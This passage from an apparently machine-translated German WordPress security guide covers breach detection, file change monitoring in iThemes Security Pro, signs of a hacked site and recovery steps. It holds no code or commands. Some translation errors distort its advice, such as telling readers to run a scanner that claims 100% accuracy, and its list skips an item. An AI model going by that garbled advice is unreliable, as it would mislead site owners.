Unzureichende Protokollierung ist eines der Top-10-Sicherheitsrisiken für Webanwendungen von OWASP. Die Überwachung des richtigen Verhaltens hilft Ihnen, Angriffe zu erkennen und zu stoppen, eine Sicherheitsverletzung zu erkennen und nach einem erfolgreichen Angriff auf den Schaden zuzugreifen und ihn zu reparieren, der Ihrer Website zugefügt wurde.

Abschnitt 10: Wenn eine WordPress-Sicherheitskatastrophe eintritt

Selbst wenn Sie die Best Practices für WordPress-Sicherheit befolgen, besteht immer noch die Möglichkeit, dass Ihre Website kompromittiert wird. Eine Kompromittierung bedeutet, dass ein Hacker Ihre Website verletzt und mit Malware infiziert hat.

Was ist eine Sicherheitsverletzung?

Eine Sicherheitsverletzung liegt vor, wenn ein Cyberkrimineller sich unbefugten Zugriff auf Ihre Website oder Ihren Server verschaffen kann. Sicherheitsverletzungen können auf viele verschiedene Arten passieren, da Hacker einige der häufigsten WordPress-Sicherheitsprobleme ausnutzen. Von der Ausführung veralteter Versionen von Plugins und Themes bis hin zu komplizierteren SQL-Injections kann selbst den wachsamsten Site-Besitzern eine Sicherheitsverletzung passieren.

Zeit zum Erkennen einer Sicherheitsverletzung: Ein Schlüsselfaktor bei der Säuberung einer infizierten Website

Wussten Sie, dass die durchschnittliche Zeit, um einen Website-Verstoß zu entdecken, 200 Tage beträgt? Leider kann ein Hacker Ihrer Website, Ihren Kunden und Ihnen umso mehr Schaden zufügen, je länger Sie brauchen, um einen Verstoß zu bemerken. Eine Malware kann in 200 Tagen einen unglaublichen Schaden anrichten. Aus diesem Grund ist es so wichtig, die Zeit zu verkürzen, die benötigt wird, um eine Sicherheitsverletzung zu erkennen.

Wieso den? Die Aufräum- und Ausfallzeiten, die Sie benötigen, um Ihre Website nach 200 Tagen Schaden zu bereinigen, sind ebenfalls atemberaubend. Die Zeit, um alles zu untersuchen, was von der Malware berührt wurde und welche Kundendaten gestohlen wurden, verlängert sich nur, solange die Sicherheitsverletzung unentdeckt bleibt. Ganz zu schweigen von der Zeit, die Sie aufwenden müssen, um Kunden zu informieren, dass sie ihre Kreditkarten sperren müssen, weil ein Hacker alle ihre Tastenanschläge protokolliert hat, während sie Ihre Website besucht haben.

Die Kosten, gehackt zu werden, sind hoch. Sie müssen jemanden bezahlen, der den Verstoß untersucht und Ihre Website säubert. Der Hack-Repair-Spezialist muss Ihre Website deaktivieren, während er funktioniert, und die Leute können keine neuen Einkäufe tätigen, während Ihre Website nicht verfügbar ist. Nachdem Sie das Vertrauen Ihrer Kunden verloren haben, werden Sie wahrscheinlich alle zukünftigen Käufe verlieren, die sie Ihnen gegeben hätten.

Die Kosten eines Hacks sind der Grund, warum es wichtig ist, einen Verstoß so schnell wie möglich zu erkennen. Je schneller Sie die Sicherheitsverletzung entdecken, desto schneller können Sie weiteren Schaden stoppen und desto schneller können Sie Ihre Website und Ihr Geschäft wieder online bringen.

Reichen Malware-Scanner aus?

Malware-Scanner bieten eine Möglichkeit, Ihre WordPress-Website nach bekannten schädlichen Dateien und Skripten zu durchsuchen. Aber reichen Malware-Scanner aus, um eine Sicherheitslücke zu erkennen?

Mit einem Wort, nein. Denken Sie nicht, dass Sie sich nur auf einen Malware-Scanner verlassen können, um zu überprüfen, ob Ihre Website infiziert ist. Kein Malware-Scanner kann jede vorhandene Malware identifizieren. Wenn Sie auf einen Malware-Scanner stoßen, der behauptet, dass er zu 100% genau ist, sollten Sie ihn ausführen, da Scans, die solche Behauptungen aufstellen, oft am wenigsten genau sind.

Erkennung von Signaturen im Vergleich zu Verhaltens-Malware

Die meisten Malware-Scans und Antivirensoftware verwenden Malware-Signaturen, um Malware zu erkennen. Fortgeschrittenere Malware-Scans verwenden eine Kombination aus Signaturerkennung und Verhaltensanalyse.

Malware-Signaturen

Eine Malware-Signatur ist eine Reihe von Bytes, die verwendet werden, um bekannte Malware-Elemente zu identifizieren. Einige Malware-Scanner werden von einer Datenbank unterstützt, die mit den Malware-Signaturen von Millionen bekannter Viren gefüllt ist.

Signaturbasiertes Malware-Scannen ist schnell, einfach und erkennt 100 % der bekannten und gut verstandenen Malware. All das ist großartig und wird Malware abfangen, die von Low-Level-Hackern hinzugefügt wurde.

Erfahrene Hacker wissen jedoch, dass Malware-Scanner nach Signaturen bekannter Malware suchen. Diese Hacker haben die Fähigkeit, Malware-Signaturen zu verschleiern, um von Ihrem durchschnittlichen Scanner unentdeckt zu bleiben.

Neue Malware wird so schnell veröffentlicht, dass Malware-Scanner ihre Datenbank nicht mit den neuesten Signaturen auf dem neuesten Stand halten können. Ein signaturbasierter Scanner kann also nicht zwischen einer neuen Malware und der readme.txt-Datei eines Plugins unterscheiden.

Verhaltensanalyse

Die Verhaltensanalyse überprüft die Aktionen einer Software, um festzustellen, ob sie bösartig ist. Es gibt eine Menge verschiedener Arten von Verhaltensweisen, die als verdächtig oder bösartig angesehen werden können. Zum Beispiel nutzt der iThemes Security Pro Site Scan die Google Safe Browsing API, um die Sicherheit von Websites zu gewährleisten. Google Safe Browsing prüft, ob eine Software den Datenverkehr auf eine bekannte bösartige Website umleitet.

Auch hier gibt es keine narrensichere Methode zur Malware-Erkennung. Eine Kombination aus Verhaltens- und Signaturprüfungen erhöht jedoch Ihre Chancen, auf Hinweise auf eine Sicherheitsverletzung aufmerksam gemacht zu werden.

Welches Verhalten teilt alle Malware?

Wir wissen, wie wichtig es ist, eine Sicherheitsverletzung so schnell wie möglich zu erkennen, und dass es nicht ausreicht, sich nur auf die Malware-Erkennung zu verlassen. Wir haben uns also gefragt, wie iThemes Security Pro die Zeit verkürzen könnte, die Benutzer benötigen, um Sicherheitsverletzungen auf ihren Websites zu erkennen?

Während die Art des Schadens, den Malware auf Ihrer Website anrichtet, sehr unterschiedlich ist, kann ihre Wirkung auf eines oder eine Kombination der folgenden drei Dinge reduziert werden.

1. Dateien hinzufügen – Malware in Form von Spyware kann eine schädliche Datei hinzufügen, die die Tastatureingaben Ihrer Kunden aufzeichnet, während sie ihre Kreditkarteninformationen eingeben.
2. Dateien entfernen – Einige Malware entfernt eine legitime Datei und ersetzt sie durch eine schädliche Datei mit demselben Namen.
3. Dateien ändern – Malware versucht, ihren bösartigen Code zu verbergen, indem sie ihn in einer vorhandenen Datei versteckt, die sie ändert.

Wäre es nicht schön, über unerwartete Änderungen an Ihrer Website informiert zu werden, damit Sie sie auf Anzeichen einer Sicherheitsverletzung untersuchen können?

So verkürzen Sie die Zeit zum Erkennen einer Sicherheitsverletzung

Der Schlüssel zum schnellen Erkennen einer Sicherheitsverletzung ist die Überwachung von Dateiänderungen auf Ihrer Website.

Die Funktion zur Erkennung von Dateiänderungen in iThemes Security Pro scannt die Dateien Ihrer Website und warnt Sie, wenn Änderungen auf Ihrer Website auftreten.

Es gibt mehrere legitime Gründe, warum Sie in Ihren Protokollen neue Dateiänderungsaktivitäten sehen, aber wenn die vorgenommenen Änderungen unerwartet waren, sollten Sie sich die Zeit nehmen, um sicherzustellen, dass die Änderungen nicht böswillig waren. Wenn Sie beispielsweise sehen, dass eine Änderung an einem Plugin am selben Datum und zu der gleichen Uhrzeit vorgenommen wurde, zu der Sie das Plugin aktualisiert haben, gibt es keinen Grund, dies zu untersuchen.

So aktivieren Sie die Erkennung von Dateiänderungen in iThemes Security Pro

So starten Sie Dateiänderungen überwachen, Dateiänderungserkennung auf der Hauptseite der Sicherheitseinstellungen ermöglichen.

Sobald der Dateiänderungserkennung aktiviert ist, Pro iThemes Security scannen alle Ihre Website - Dateien in Blöcken starten. Wenn Sie Ihre Dateien in Blöcken scannen, können Sie die Ressourcen reduzieren, die für die Überwachung von Dateiänderungen erforderlich sind.

Der anfängliche Dateiänderungsscan erstellt einen Index der Dateien Ihrer Website und ihrer Datei-Hashes. Ein Datei-Hash ist eine verkürzte, nicht von Menschen lesbare Version des Inhalts der Datei.

Nachdem der erste Scan abgeschlossen ist, scannt iThemes Security Pro Ihre Datei weiterhin in Stücken. Wenn sich der Hash einer Datei bei einem der folgenden Scans ändert, bedeutet dies, dass sich der Inhalt der Datei geändert hat.

Sie können auch eine manuelle Dateiänderung durchführen, indem Sie in den Einstellungen für die Erkennung von Dateiänderungen auf die Schaltfläche Dateien jetzt scannen klicken

Aktivieren von Benachrichtigungs-E-Mails zu Dateiänderungen

Dateiänderungen passieren ständig, und es wäre schnell überwältigend, bei jeder Änderung eine E-Mail-Benachrichtigung zu erhalten. Und bevor Sie es wissen, wird es ein Junge, der in einer Wolfssituation schreit, und Sie beginnen, die Dateiänderungswarnungen vollständig zu ignorieren.

Sehen wir uns an, wie iThemes Security Pro legitimierte Änderungen intelligent erkennt, um Benachrichtigungen zu reduzieren, und wie Sie Benachrichtigungen für Dateien stummschalten können, die voraussichtlich häufig aktualisiert werden.

Sie können alle Ihre iThemes-Sicherheitsbenachrichtigungen über die Mitteilungszentrale im iThemes-Sicherheits-Plugin verwalten. Rufen Sie in Ihrem WordPress-Admin-Dashboard Sicherheit > Einstellungen auf und suchen Sie das Notification Center- Modul.

Wie iThemes Security Pro legitime Dateiänderungen erkennt

Es gibt mehrere Möglichkeiten, wie iThemes Security Pro erkennen kann, ob eine an einer Datei vorgenommene Änderung legitim und kein Grund zur Besorgnis war. iThemes Security Pro erstellt keine Dateiänderungsbenachrichtigung für Änderungen, die es überprüfen kann.

1. Plugin-/Theme-Updates, die von der Versionsverwaltung abgeschlossen wurden

Mit der Versionsverwaltungsfunktion in iThemes Security Pro können Sie WordPress, Plugins und Designs automatisch aktualisieren.

Wenn ein Update von der Versionsverwaltung abgeschlossen wird, kennt iThemes Security Pro die Quelle des Updates und löst keine Warnung aus.

2. Dateivergleich für iThemes Plugins & Themes

Aktivieren Sie das Kontrollkästchen Dateien online vergleichen in den Einstellungen zur Erkennung von Dateiänderungen, um den Online-Dateivergleich zu aktivieren.

Jedes Mal, wenn eine Datei auf Ihrer Website, die zu einem iThemes-Plugin oder -Theme gehört, geändert wird, wird sie mit einer Datei auf dem iThemes-Server verglichen. Wenn der Hash der Version der Datei auf Ihrer Website mit dem Hash der Version auf dem iThemes-Server übereinstimmt, ist dies eine legitime Änderung und Sie erhalten keine Warnung.

3. WordPress.org Online-Dateivergleich

Wenn eine WordPress-Core-Datei oder ein aus dem WordPress.org-Repository installiertes Plugin geändert wird, wird die Datei mit der Version auf WordPress.org verglichen. Wenn die Hashes übereinstimmen, sind die Änderungen nicht bösartig und Sie erhalten keine Warnung.

4. Manuelle Ausschlüsse

Sie können Dateien, Verzeichnisse und Dateitypen von der Dateiänderungserkennung in den Einstellungen für die Dateiänderungserkennung ausschließen.

Die allgemeine Regel lautet, dass es in Ordnung ist, Dateien auszuschließen, von denen Sie wissen, dass sie regelmäßig aktualisiert werden. Backup- und Cache-Dateien sind ein perfektes Beispiel dafür. Das Ausschließen dieser Dateitypen wird einen Großteil des zusätzlichen Rauschens beruhigen.

7 Anzeichen dafür, dass Ihre WordPress-Website gehackt wurde

Sie fragen sich: „ Ist meine WordPress-Site gehackt? “ bedeutet, dass Sie einige schnelle Antworten benötigen.

Je schneller Sie die Anzeichen einer Website-Verletzung bemerken, desto schneller können Sie Ihre Website bereinigen. Je schneller Sie Ihre Website säubern können, desto weniger Schaden kann der Hack Ihrer Website anrichten.

1. Ihre Homepage ist anders

Änderungen an Ihrer Homepage scheinen ein offensichtliches Zeichen zu sein. Aber wie oft überprüfen Sie Ihre Homepage tatsächlich gründlich? Ich weiß, dass ich normalerweise direkt zu meiner Login-URL und nicht zu meiner Home-URL gehe. Von dort aus logge ich mich ein, aktualisiere meine Seite oder bearbeite einen Beitrag. Nachdem ich meine Arbeit beendet habe, gehe ich oft, ohne die Homepage meiner Website anzuschauen.

Das Hauptziel einiger Hacks ist es, eine Website zu trollen oder Bekanntheit zu erlangen. So ändern sie Ihre Homepage nur in etwas, das sie lustig finden oder hinterlassen eine gehackte Visitenkarte.

Wenn Sie eine Änderung an Ihrer Homepage bemerken, können Sie Ihre Website schnell und einfach wiederherstellen, indem Sie eine Backup-Datei verwenden, die mit einem vertrauenswürdigen WordPress-Backup-Plugin wie BackupBuddy erstellt wurde.

2. Die Leistung Ihrer Website ist gesunken

Ihre Website kann sich bei einer Infektion träge anfühlen. Es kann zu Verlangsamungen auf Ihrer Website kommen, wenn Sie Brute-Force-Angriffe erleben oder wenn ein bösartiges Skript Ihre Serverressourcen für das Mining von Kryptowährungen verwendet. In ähnlicher Weise tritt ein DDoS (oder Denial-of-Service-Angriff ) auf, wenn ein Netzwerk von IPs gleichzeitig Anfragen an Ihre Website sendet, um sie zum Absturz zu bringen.

3. Ihre Website enthält bösartige oder Spam-Popups-Anzeigen

Es besteht eine gute Chance, dass ein Hacker Ihre Website kompromittiert hat, wenn Ihre Besucher Popups sehen, die sie auf eine bösartige Website umleiten. Das Ziel dieser Art von Angriff besteht darin, den Datenverkehr von Ihrer Website auf die Website des Angreifers zu lenken, damit diese Benutzer mit Klickbetrug für Pay-per-Click-Werbung anvisieren können.

Das Frustrierendste an dieser Art von Hack ist, dass Sie die Popups möglicherweise nicht sehen können. Ein Popup-Hack kann so gestaltet werden, dass er für eingeloggte Benutzer nicht angezeigt wird, was die Wahrscheinlichkeit verringert, dass Website-Besitzer sie sehen. Selbst wenn sich der Websitebesitzer abmeldet, werden die Popups nie angezeigt.

Ihre Sicht auf die Popups kann auch eingeschränkt sein, wenn Sie eine Werbeblocker-Erweiterung in Ihrem Browser verwenden. Ein Kunde hat beispielsweise einen Popup-Hack gemeldet und Screenshots und ein Video der Popups geteilt. Nachdem ich Stunden damit verbracht hatte, ihre Website zu durchsuchen, war ich nicht in der Lage, alles, was sie berichteten, neu zu erstellen. Ich war überzeugt, dass ihr PC gehackt wurde und nicht die Website.

Schließlich wurde mir klar, warum ich die Popups nicht sehen konnte. Ich hatte eine Adblocker-Erweiterung in meinem Browser installiert. Sobald ich die Adblocker-Erweiterung deaktiviert hatte, konnte ich überall Popups sehen. Ich teile diese peinliche Geschichte, um Sie hoffentlich vor dem gleichen Fehler zu bewahren.

4. Sie bemerken einen Rückgang des Website-Traffics

Wenn Sie sich bei Ihrem Google Analytics-Konto anmelden und einen starken Rückgang des Website-Traffics feststellen, könnte Ihre WordPress-Site gehackt werden. Ein Rückgang des Website-Traffics verdient eine Untersuchung. Möglicherweise befindet sich auf Ihrer Website ein schädliches Skript, das Besucher von Ihrer Website wegleitet, oder Google könnte Ihre Website bereits als bösartige Website auf die schwarze Liste setzen.

Das erste, wonach Sie suchen sollten, ist der ausgehende Datenverkehr Ihrer Website. Wenn Sie Ihre Website mit Google Analytics verfolgen, müssen Sie Ihre Website so konfigurieren, dass der Verkehr verfolgt wird, der Ihre Website verlässt. Der einfachste Weg, den ausgehenden Datenverkehr auf Ihrer WordPress-Site zu überwachen, besteht darin, ein WordPress-Google Analytics-Plugin zu verwenden.

6. Unerwartete neue Benutzer

Wenn Ihre Website unerwartete Registrierungen neuer Admin-Benutzer aufweist, ist dies ein weiteres Zeichen dafür, dass Ihre WordPress-Site gehackt wurde. Durch einen Exploit eines kompromittierten Benutzers kann ein Angreifer einen neuen Administratorbenutzer erstellen. Mit seinen neuen Administratorrechten ist der Hacker bereit, Ihrer Site großen Schaden zuzufügen.

Erinnern Sie sich an das WP-DSGVO-Compliance-Plugin von früher? Im November 2018 hatten wir mehrere Berichte über die Erstellung neuer Admin-Benutzer auf Kunden-Websites. Hacker nutzten eine Schwachstelle im WP-DSGVO-Compliance-Plugin (in Version 1.4.3 gepatchte Schwachstelle), um neue Admin-Benutzer auf WordPress-Sites zu erstellen, auf denen das Plugin ausgeführt wird. Der Plugin-Exploit ermöglichte es nicht autorisierten Benutzern, die Benutzerregistrierung zu ändern, um die Standardrolle eines neuen Benutzers von einem Abonnenten in einen Administrator zu ändern. Leider war dies nicht die einzige Schwachstelle und Sie können nicht einfach die neuen Benutzer entfernen, die der Angreifer erstellt hat, und das Plugin patchen.

Wenn Sie WP GDPR Compliance und WooCommerce installiert hatten, wurde Ihre Website möglicherweise mit bösartigem Code injiziert. Die Angreifer könnten das Hintergrund-Installationsprogramm des WooCommerce-Plugins verwenden, um ein Backdoor-Installationsprogramm in die Datenbank einzufügen. Wenn auf Ihrer Website eine Hintertür installiert ist, sollten Sie sich an einen Hack-Reparatur-Spezialisten wenden. Eine andere Möglichkeit besteht darin, eine Sicherungsdatei zu verwenden, um vor der Verletzung eine Kopie Ihrer Website mithilfe einer vorherigen Sicherung zurückzusetzen.

7. Admin-Benutzer entfernt

Wenn Sie sich auch nach einem Zurücksetzen des Passworts nicht bei Ihrer WordPress-Site anmelden können, kann dies ein ernsthaftes Anzeichen für eine Infektion sein.

Als das Gentoo Github Repo gehackt wurde, löschte der Angreifer als erstes alle Admin-Benutzer. Wie ist dieser Hacker überhaupt in seinen Github-Account gelangt? Das Passwort eines Gentoo-Admin-Benutzers wurde auf einer anderen Site entdeckt. Ich vermute, dass der Benutzername und das Passwort entweder durch Scraping oder einen Datenbank-Dump entdeckt wurden.

Obwohl das Admin-Passwort für ihr Gentoo Github-Konto ein anderes war als für das kompromittierte Konto, war es sehr ähnlich. Das wäre also so, als würde ich iAmAwesome2020 als Passwort auf einem Konto und iAmAwesome2021 auf einer anderen Site verwenden. So konnten die Hacker mit wenig Aufwand das Passwort herausfinden. Wie wir sehen, sollten Sie für jedes Konto ein eindeutiges Passwort verwenden. Eine einfache Variation Ihrer Passwörter reicht nicht aus. Mit LastPass können Sie starke, eindeutige Passwörter für jede Site generieren und sicher speichern.

Wie man aus einer Katastrophe zurückkommt

Wenn Sie vermuten, dass eine Sicherheitsverletzung aufgetreten ist, können Sie den Schaden mithilfe einiger schneller Schritte begrenzen.

Wiederherstellen einer vorherigen/sauberen Sicherung Ihrer Site

Der sicherste Weg, eine Sicherheitsverletzung rückgängig zu machen, besteht darin, Ihre Site vor dem Angriff auf eine frühere Version zurückzusetzen. Aus diesem Grund ist es so wichtig, eine umfassende WordPress-Backup-Lösung zu haben. Wir empfehlen, BackupBuddy zu verwenden, um die automatische Ausführung von Backups zu planen, damit Sie immer über ein Backup verfügen.

Beachten Sie jedoch, dass die Wiederherstellung eines früheren Backups Ihre Website möglicherweise immer noch anfällig für dieselbe Sicherheitsverletzung machen kann. Daher ist es wichtig, auch diese Schritte zu befolgen.

Aktualisieren Sie alle veralteten Plugins und Themes sofort

Ein anfälliges Plugin oder Theme kann immer noch der Übeltäter sein, daher ist es wichtig, alle veralteten Plugins oder Themes SOFORT zu aktualisieren. Selbst wenn Sie eine vorherige saubere Version Ihrer Website wiederherstellen, bleiben die gleichen Schwachstellen bestehen und können erneut gehackt werden.

Sie können auch überprüfen, ob Sie kein anfälliges Plugin oder Theme ausführen, für das noch kein Patch vom Entwickler vorliegt. Sie müssen dieses Plugin sofort entfernen.

Aktivieren Sie die Zwei-Faktor-Authentifizierung

Wenn Sie die Zwei-Faktor-Authentifizierung nicht verwenden, um Administrator-Logins zu sichern, aktivieren Sie sie sofort. Diese zusätzliche Sicherheitsebene stellt sicher, dass nicht autorisierte Benutzer keine Administratorkonten hacken können.

Suchen Sie Hilfe bei der professionellen Entfernung von Malware

WordPress-Sicherheitsverletzungen treten auf Serverebene auf (tiefer als Ihre WordPress-Installation), daher müssen Sie sich möglicherweise an einen professionellen Malware-Entfernungsdienst wenden. Wir empfehlen WeWatchYourWebsite für die professionelle Entfernung von Malware.

Zusammenfassung: Ultimativer Leitfaden für WordPress-Sicherheit

In diesem WordPress-Sicherheitsleitfaden haben wir VIEL behandelt! Wenn Sie jedoch die Tipps in diesem Handbuch befolgen, werden Sie fast 100 % der Angriffe auf Ihre Website blockieren.

Ein WordPress-Sicherheits-Plugin kann helfen, Ihre WordPress-Website zu schützen

Gepaart mit dem Wissen über die WordPress-Sicherheitsthemen in diesem Handbuch kann ein WordPress-Sicherheits-Plugin helfen, Ihre WordPress-Website zu schützen. iThemes Security Pro, unser WordPress-Sicherheits-Plugin, bietet über 50 Möglichkeiten, Ihre Website zu sichern und vor gängigen WordPress-Sicherheitslücken zu schützen. Mit WordPress, Zwei-Faktor-Authentifizierung, Brute-Force-Schutz, starker Passwortdurchsetzung und mehr können Sie Ihrer Website eine zusätzliche Sicherheitsebene hinzufügen.

Michael Moore

Jede Woche erstellt Michael den WordPress-Schwachstellenbericht, um die Sicherheit Ihrer Websites zu gewährleisten. Als Produktmanager bei iThemes hilft er uns, die Produktpalette von iThemes weiter zu verbessern. Er ist ein riesiger Nerd und liebt es, alles über Technik zu lernen, alt und neu. Sie können Michael mit seiner Frau und seiner Tochter treffen, lesen oder Musik hören, wenn er nicht arbeitet.